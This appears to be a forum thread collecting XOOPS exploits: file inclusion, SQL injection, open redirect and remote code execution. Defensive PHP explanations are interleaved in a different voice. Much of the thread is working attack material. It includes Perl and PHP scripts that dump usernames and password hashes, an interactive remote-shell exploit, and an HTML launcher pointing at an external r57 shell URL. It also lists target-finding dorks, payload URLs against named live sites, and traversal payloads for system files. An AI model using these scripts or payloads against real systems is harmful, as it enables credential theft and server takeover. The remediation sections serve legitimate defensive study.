LFI
Vulnerable: XOOPS 2.0.18
Vulnerable script: htdocs/install/index.php
PHP:
$language = 'english';
if ( !empty($_POST['lang']) ) {
    $language = $_POST['lang'];
. . . .
if ( file_exists("./language/".$language."/install.php") ) {
    include_once "./language/".$language."/install.php";
The POST variable "lang" is not filtered.
PoC:
Code:
POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php

lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next

URL Redirection
Vulnerable: XOOPS 2.0.18
Vulnerable script: htdocs/user.php?xoops_redirect
The POST variable "xoops_redirect" is not filtered.
PoC:
Code:
http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com
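The xoops_redirect issue above is an open redirect: whatever is passed in the parameter becomes the Location header after login. The following is an added example (my own code, not XOOPS's user.php) of the check a post-login redirect needs; the function names and the site URL are assumptions made for the demo. It treats an absolute URL as safe only when scheme, host and port match the site, and a relative target as safe only when it is a single-slash path without traversal, which also covers the scheme-relative "//evilsite.com" and backslash variants browsers accept.

```php
<?php
// Added example (not XOOPS code): validating a post-login redirect target so that
// user.php?xoops_redirect=http://evilsite.com cannot send the user off-site.
// is_safe_redirect()/redirect_after_login() and the site URL are assumptions.

function is_safe_redirect(string $target, string $siteUrl): bool
{
    // Control characters (CR/LF) would allow header injection through Location:.
    if (preg_match('/[\x00-\x1f\x7f]/', $target)) {
        return false;
    }
    // Browsers treat "/\evil.com" like "//evil.com"; normalise before parsing.
    $target = str_replace('\\', '/', $target);

    $site  = parse_url($siteUrl);
    $parts = parse_url($target);
    if ($parts === false || !isset($site['scheme'], $site['host'])) {
        return false;
    }
    // Absolute or scheme-relative URL: scheme, host and port must all match the site.
    if (isset($parts['scheme']) || isset($parts['host'])) {
        return isset($parts['scheme'], $parts['host'])
            && strcasecmp($parts['scheme'], $site['scheme']) === 0
            && strcasecmp($parts['host'], $site['host']) === 0
            && ($parts['port'] ?? null) === ($site['port'] ?? null);
    }
    // Relative URL: one leading "/", not "//", and no ".." path component.
    $path = $parts['path'] ?? '';
    return $path !== '' && $path[0] === '/' && substr($path, 0, 2) !== '//'
        && !preg_match('#(^|/)\.\.(/|$)#', $path);
}

function redirect_after_login(string $requested, string $siteUrl): string
{
    // Anything that fails the check falls back to the site root.
    return is_safe_redirect($requested, $siteUrl) ? $requested : $siteUrl . '/';
}

// Constructed inputs for the demo; the first three are the attacker-controlled forms.
$site = 'http://localhost/xoops-2.0.18/htdocs';
$targets = [
    'http://evilsite.com',
    '//evilsite.com',
    '/\\evilsite.com',
    'http://localhost/xoops-2.0.18/htdocs/index.php',
    '/xoops-2.0.18/htdocs/user.php?op=main',
];
foreach ($targets as $t) {
    printf("%-50s -> %s\n", $t, redirect_after_login($t, $site));
}
```

The first three targets resolve to the site root, the last two are passed through unchanged. Comparing against the configured site URL rather than against the Host header matters, because the Host header is attacker-controlled as well.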
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
Code:
##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################

EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####[email protected]#####
###########################################
# milw0rm.com [2008-03-17]
XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability
SQL Injection
Vulnerable: XOOPS Project-Recette(Recipe)2.2
Exploit:
Code:
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
Dork:
Code:
allinurl:"modules/recipe"
RFI
Vulnerable: XOOPS Module XFsection
Vuln script: modify.php
PoC:
Code:
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

Vulnerable: XOOPS Module XT-Conteudo
Vuln script: /admin/spaw/spaw_control.class.php
PHP:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
PoC:
Code:
http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?

Vulnerable: XOOPS Module Cjay Content 3
Vuln script: /admin/editor2/spaw_control.class.php
PHP:
include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';
Note: Register globals must be ON, and Magic Quotes must be OFF
PoC:
Code:
http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell]?

Vulnerable: XOOPS Module icontent 1.0
Exploit:
HTML:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</title>
<script language="JavaScript">
//'===============================================================================================
//'[Script Name: XOOPS Module icontent v.1.0
//'[Author : Mahmood_ali
//'[S.Page : http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//'===============================================================================================
//'[[V.Code]]------------------------------------------------------
//'
//'include $spaw_root.'config/spaw_control.config.php';
//'include $spaw_root.'class/toolbars.class.php';
//'include $spaw_root.'class/lang.class.php';
//'
//'[[V.Code]]---------------------------------------------------------
//# Tryag.Com
//# ...
var path="/modules/icontent/include/wysiwyg/"
var adres="spaw_control.class.php" //File name
var acik ="?spaw_root=" // Line 15
var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell
function command(){
  if (document.rfi.target1.value==""){
    alert("Failed..");
    return false;
  }
  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
  rfi.submit(); // Form Submit
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Arial" size="2" color="#FFFFFF">XOOPS Module icontent v.1.0 Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<p><b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Tahoma"> </font><font color="#FF0000" size="2"> </font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<p><b><font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font></b></p>
<p><b><a href="http://tryag.com/cc"><font face="Lucida Handwriting" size="5" color="#FFFFFF">TrYaG-Team</font></a></b></p>
</center>
</body>
</html>

Vulnerable: XOOPS Module tsdisplay4xoops 0.1
PoC:
Code:
[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell

Remote SQL Injection
Vulnerable: XOOPS Module Jobs <= 2.4
Code:
#!/usr/bin/perl
#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[Dork : "inurl:/modules/jobs/"
#[S.Page : http://www.jlmzone.com/
#[$$ : Free
#[.. : ajann,Turkey

use IO::Socket;

if(@ARGV < 1){
print "
[========================================================================
[// XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}

#Local variables
$kapan = "/*";
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/modules/jobs/index.php?pa=jobsview&cid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){} else {
print "-- Exploit Failed[No DIR] \n";
exit();
}

print "User ID (uid): ";
$id = <STDIN>;
chop ($id);

$target = "-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";

#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed!\nGetting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)<\/b>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
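The three spaw_root posts above (XT-Conteudo, Cjay Content, icontent) and the tsdisplay4xoops xoops_url one are the same bug: a path prefix used in include is never initialised by the script, so with register_globals=On a query parameter supplies it, and with URL fopen allowed include() fetches it over HTTP (the trailing "?" in the PoCs turns the rest of the include path into a query string of the remote request, so "config/spaw_control.config.php" no longer breaks the URL). The block below is an added example, my own code rather than SPAW's or any XOOPS module's: the vulnerable include shape next to the hardened one, plus a path check for legacy code that has to accept a prefix from configuration. Function names are assumptions; the three include targets are the ones the posts quote.

```php
<?php
// Added example (not SPAW/XOOPS code): the spaw_root include pattern in its
// vulnerable and hardened shapes, plus a reusable local-path check.

// Vulnerable shape: $spaw_root is never assigned here, so under register_globals=On
// "?spaw_root=http://attacker/r57.txt?" defines it before the includes run.
function spaw_includes_vulnerable(): void
{
    global $spaw_root;                       // comes straight from the request
    include $spaw_root . 'config/spaw_control.config.php';
    include $spaw_root . 'class/toolbars.class.php';
    include $spaw_root . 'class/lang.class.php';
}

// Hardened shape: derive the prefix from this file's own location. Request
// variables cannot influence it even with register_globals=On.
function spaw_includes_hardened(): void
{
    $spaw_root = dirname(__FILE__) . '/';    // absolute, fixed, inside the module
    include $spaw_root . 'config/spaw_control.config.php';
    include $spaw_root . 'class/toolbars.class.php';
    include $spaw_root . 'class/lang.class.php';
}

// For code that must accept a prefix from configuration: reject null bytes, any
// "scheme:" prefix (http://, ftp://, php://, data:, phar://, ...), and anything
// whose resolved path is outside the allowed base directory.
function is_local_include_path(string $candidate, string $baseDir): bool
{
    if (strpos($candidate, "\0") !== false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return false;                        // stream wrapper or remote URL
    }
    $real = realpath($candidate);            // resolves symlinks and ".."
    $base = realpath($baseDir);
    return $real !== false && $base !== false
        && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

// Constructed demo layout: a temp directory stands in for the module root.
$base = sys_get_temp_dir() . '/spaw_demo';
@mkdir($base . '/config', 0700, true);
touch($base . '/config/spaw_control.config.php');

$candidates = [
    $base . '/config/',                      // legitimate, inside the module
    'http://lppm.uns.ac.id/r57.txt?',        // the remote shell from the icontent exploit
    'php://input',                           // wrapper: request body as PHP source
    '/etc/',                                 // local but outside the base
    $base . "/config/\0",                    // null-byte truncation attempt
];
foreach ($candidates as $p) {
    printf("%-45s %s\n", addcslashes($p, "\0"),
           is_local_include_path($p, $base) ? 'local' : 'REJECTED');
}
```

Only the first candidate passes. The real fix is the second function: when the prefix is computed from `__FILE__` there is nothing for the request to override, and the check function only matters for code paths where a prefix genuinely comes from outside. Setting allow_url_include=Off (separate from allow_url_fopen since PHP 5.2) and register_globals=Off closes the same bug class across every module on the host.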
Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it
Code:
#############################################
#Coded By Cr@zy_King http://coderx.org]#
#############################################

use IO::Socket;

if (@ARGV != 3) {
print "\n-----------------------------------\n";
print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
print "-----------------------------------\n";
print "\n4ever Cra\n";
print "crazy_kinq[at]hotmail.co.uk\n";
print "http://coderx.org\n";
print "\n-----------------------------------\n";
print "\nKullanim: $0 <server> <path> <uid>\n";
print "Ornek: $0 www.victim.com /path 1\n";
print "\n-----------------------------------\n";
exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path,$server,$uid);

while(<$socket>) {
if (/\>(\w{32})\</) {
print "\nID '$uid' User Password :\n\n$1\n";
}
}

# Cr@zy_King
# http://coderx.org
# [email protected]
Solide Snake, I have never come across a blind one.

xoops # Article Module # sql injection
Code:
modules/articles/article.php?id={SQL}-- +xoops_users -uname -pass

example:
Code:
http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--

mega exploit :
Code:
#!/usr/bin/perl
use LWP::UserAgent;

print qq( # xoops article module exploit # # coded by ph1l1ster #\n\n# Enter site:\n> );
$site = <STDIN>;chomp($site);
print "\n# Enter numbers of users:\n> ";
$users = <STDIN>;chomp($users);

&inj;

sub inj{
print "\nStarting..\n\n";
$limit = 0;
while ($limit <= $users){
$url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
$client = LWP::UserAgent->new( ) or die;
$answer = $client->get($url);
$limit ++;
if ($answer->content =~ /555666:(.*):777888/){
print $1."\n";}}
print "Done!"}
XOOPS modules/easyweb/ SQL-inj
Exploit
Code:
-555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--
http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--
dOrK: inurl:/modules/easyweb/
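Every SQL injection in this thread (dictionary print.php?id, recipe detail.php?id, articles article.php?id, jobs cid, easyweb artid) has the same root cause: a numeric id concatenated into the query as received. A negative or nonexistent id empties the real result set, the UNION supplies the attacker's row, the column count is padded with literals until it matches, and `/*` or `--` comments out whatever follows; the `/**/` sequences are comment-as-whitespace to get past naive filters. `concat(uname,0x3a,pass)` returns `user:hash` (0x3a is ":"), and because XOOPS 2.0.x stored unsalted MD5 password hashes, the Cr@zy_King script above simply greps for a 32-character word. The block below is an added example, my own code rather than any XOOPS module's: the vulnerable query shape beside a hardened one, with the thread's payloads pushed through both. The article table and column names are assumptions; only xoops_users/uname/pass come from the posts.

```php
<?php
// Added example (not XOOPS or module code): numeric-id SQL injection, vulnerable
// shape beside the hardened one. demo_articles/title/body are assumed names.

// Vulnerable shape: the id lands in the SQL text unquoted and unvalidated, so the
// UNION payload becomes part of the statement.
function article_sql_vulnerable(string $id): string
{
    return "SELECT id, title, body FROM demo_articles WHERE id=" . $id;
}

// Hardened, step 1: accept only a plain decimal number. intval() alone would turn
// "-9999999 union ..." into -9999999 silently and hide the attack from the logs.
function parse_article_id(string $raw): ?int
{
    return preg_match('/^\d{1,10}$/', $raw) ? (int) $raw : null;
}

// Hardened, step 2: bind the validated id; the value can never reach the parser.
function fetch_article(mysqli $db, string $raw): ?array
{
    $id = parse_article_id($raw);
    if ($id === null) {
        return null;                             // caller answers 404
    }
    $stmt = $db->prepare('SELECT id, title, body FROM demo_articles WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Constructed inputs: a benign id and two payloads in the shape the thread uses.
$payloads = [
    '42',
    '-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*',
    '-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--',
];
foreach ($payloads as $p) {
    $p = urldecode($p);                          // "+" becomes a space, as the server sees it
    printf("vulnerable SQL : %s\n", article_sql_vulnerable($p));
    printf("validated id   : %s\n\n", var_export(parse_article_id($p), true));
}
```

For the two payloads the vulnerable function hands MySQL a complete `SELECT ... UNION SELECT ... FROM xoops_users` statement while `parse_article_id()` returns NULL; for "42" both agree. Strict validation and binding together also remove the blind variant: with a bound integer there is no boolean or time-based side channel to probe.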
XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
Code:
#!/usr/bin/php -q
<?php
/****************************************************************
 * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
 * by athos - staker[at]hotmail[dot]it
 * http://xoops.org
 *
 * thanks to s3rg3770 and The:Paradox
 *
 * works with register globals on
 * note: this vuln is a remote php code execution
 *
 * Directory (xoops_lib/modules/protector/)
 * onupdate.php?mydirname=a(){} [PHP CODE] function v
 * oninstall.php?mydirname=a(){} [PHP CODE] function v
 * notification.php?mydirname=a(){} [PHP CODE] function v
 ****************************************************************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {
    print "\n+--------------------------------------------------------------+\n";
    print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n";
    print "\r+--------------------------------------------------------------+\n";
    print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
    print "\rUsage: php xpl.php [host] [path] [num]\n\n";
    print "\rhost + localhost\n";
    print "\rpath + /XOOPS\n";
    print "\rnum  + 1 = onupdate.php, 2 = notification.php, 3 = oninstall.php\n";
    exit;
}

exploit();

function exploit()
{
    global $num;
    // only the three target files listed in the header are valid options
    if ($num < 1 || $num > 3) {
        die("\n$num isn't a valid option\n");
    } else {
        yeat_shell();
    }
}

function yeat_shell()
{
    while (1) {
        echo "yeat[php-shell]~$: ";
        $exec = stripslashes(trim(fgets(STDIN)));
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
        if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
        if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
        print data_exec($exec);
    }
}

function data_exec($exec)
{
    global $host,$path,$num;
    if ($num == 1) {
        $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
    }
    if ($num == 2) {
        $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
    }
    if ($num == 3) {
        $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
    }
    $exec = urlencode($exec);
    // the input is spliced between "a(){}" and "function v" in the mydirname value
    $data  = "";
    $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Connection: close\r\n\r\n";
    $html = data_send ($host,$data);
    return $html;
}

function data_send ($host,$data)
{
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again!\n");
    }
    fputs($sock,$data);
    $html = "";
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

(c)milw0rm.com
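The payload shape in the exploit above, `a(){}` + code + `function v`, tells you what the target does with mydirname: the value is spliced into a function declaration that is then passed to eval(), so `a(){}` closes the generated function early, the attacker's PHP runs at declaration time, and `function v` reopens a declaration so the remainder still parses. (That also means the input has to be PHP source such as `system('uname -a');`, not the bare `uname -a` the exploit's help text suggests.) The block below is an added example and not the Protector module's code; the page shows only the payload, and the eval'd-declaration shape here is my reconstruction of the pattern it targets. Function names are assumptions.

```php
<?php
// Added example (not XOOPS/Protector code): how a mydirname payload becomes
// executable source when spliced into an eval'd declaration, and the whitelist
// that stops it. The generating function below is a reconstruction, not the
// module's own code.

// Reconstructed vulnerable shape: a module meant to be installed under several
// directory names generates its per-instance hook from the directory name.
function build_update_hook_vulnerable(string $mydirname): string
{
    return 'function xoops_module_update_' . $mydirname
         . '($module) { return true; }';
}

// A directory name XOOPS can actually install is a plain identifier; anything
// else (braces, parentheses, quotes, whitespace) has no business in it.
function is_valid_dirname(string $mydirname): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_]{1,64}$/', $mydirname);
}

function build_update_hook_hardened(string $mydirname): string
{
    if (!is_valid_dirname($mydirname)) {
        throw new InvalidArgumentException('invalid mydirname');
    }
    // Constrained to an identifier, the splice can only ever name a function.
    return build_update_hook_vulnerable($mydirname);
}

// Constructed payload in the exploit's shape. It is only printed here, never eval'd.
$payload = 'a(){} echo "attacker code runs here"; function v';

echo "generated source (vulnerable shape):\n";
echo build_update_hook_vulnerable($payload), "\n\n";

try {
    build_update_hook_hardened($payload);
} catch (InvalidArgumentException $e) {
    echo "hardened: rejected (", $e->getMessage(), ")\n";
}
echo "hardened: ", build_update_hook_hardened('protector'), "\n";
```

Run it and the first line of output is a complete, syntactically valid PHP source in which the `echo` sits between two function declarations; fed to eval(), it executes immediately. The hardened path rejects the payload and accepts `protector`. Turning register_globals off removes the way the value reached the script in the first place, but the whitelist is what makes the eval itself safe regardless of where mydirname comes from.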
LFI [Xoops 2.2.6]
I happened to have this version at hand. Look at the source of system/admin.php:
Code:
<?php
if (isset($_POST['fct'])) {
    $fct = trim($_POST['fct']);
}
if (isset($_GET['fct'])) {
    $fct = trim($_GET['fct']);
}
$xoopsOption['pagetype'] = "admin";
include "../../mainfile.php";
if (!$xoopsUser) {
    redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
}
include XOOPS_ROOT_PATH."/include/cp_functions.php";
include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
$error = false;
if (isset($fct) && $fct != '') {
    if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {
        if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
            include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
        } elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
            ...
        }
        include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
        ...
Exploit:
Code:
http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00
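Both local file inclusions in this thread, install/index.php with `$_POST['lang']` (first post) and system/admin.php with `$fct` (above), share the same mistake: file_exists() is used as if it were an authorisation check. It is not. On PHP before 5.3.4 the filesystem functions stop reading the path at a null byte, so `../../../../../../../etc/passwd%00/xoops_version.php` is checked and then included as `/etc/passwd`; a file with no `<?php` tag is simply echoed. Two caveats on the admin.php variant: redirect_header() exits, so it needs a logged-in account (any user, not an administrator), and the language include fires before the xoops_version.php include, so the traversal is hit twice. The block below is an added example, my own code and not XOOPS's: the vulnerable include shape beside a hardened one that constrains the name first and verifies the resolved path second. Directory names and function names are assumptions.

```php
<?php
// Added example (not XOOPS code): language/module-name include, vulnerable shape
// beside the hardened one. The demo directory layout is constructed.

// Vulnerable shape: file_exists() proves the path exists, not that it is the file
// we meant. Traversal passes, and on PHP < 5.3.4 a %00 truncates the suffix away.
function include_language_vulnerable(string $language): void
{
    if (file_exists("./language/" . $language . "/install.php")) {
        include_once "./language/" . $language . "/install.php";
    }
}

// Hardened shape, step 1: the name must be an identifier (rejects "../", "\0",
// "http://", everything that is not a language or module directory name).
// Step 2: the resolved path must still lie under the directory we intended.
function resolve_language_file(string $baseDir, string $language): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $language)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $language . '/install.php');
    if ($base === false || $file === false) {
        return null;                             // unknown language: caller falls back
    }
    // realpath() has resolved symlinks and "..", so a prefix check is sound here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

function include_language_hardened(string $baseDir, string $language): bool
{
    $file = resolve_language_file($baseDir, $language);
    if ($file === null) {
        return false;                            // e.g. retry with 'english'
    }
    include_once $file;
    return true;
}

// Constructed layout: a temp directory stands in for ./language with one language.
$base = sys_get_temp_dir() . '/xoops_lang_demo';
@mkdir($base . '/english', 0700, true);
file_put_contents($base . '/english/install.php', "<?php // language file\n");

$inputs = [
    'english',                                   // legitimate
    'russian',                                   // well-formed but not installed
    "/../../../../../../../../boot.ini\0.html",  // payload from the first post
    '../../../../../../../etc/passwd',           // traversal without null byte
    "../../../../../../../etc/passwd\0",         // payload from the post above
];
foreach ($inputs as $in) {
    printf("%-45s -> %s\n", addcslashes($in, "\0"),
           resolve_language_file($base, $in) ?? 'rejected');
}
```

Only `english` resolves. The order of the two checks matters: the identifier test runs before realpath(), because realpath() on a string containing a null byte raises an error on current PHP and silently truncated on the old versions these exploits target. The prefix check is the backstop for the day somebody loosens the pattern to allow a dash or a dot.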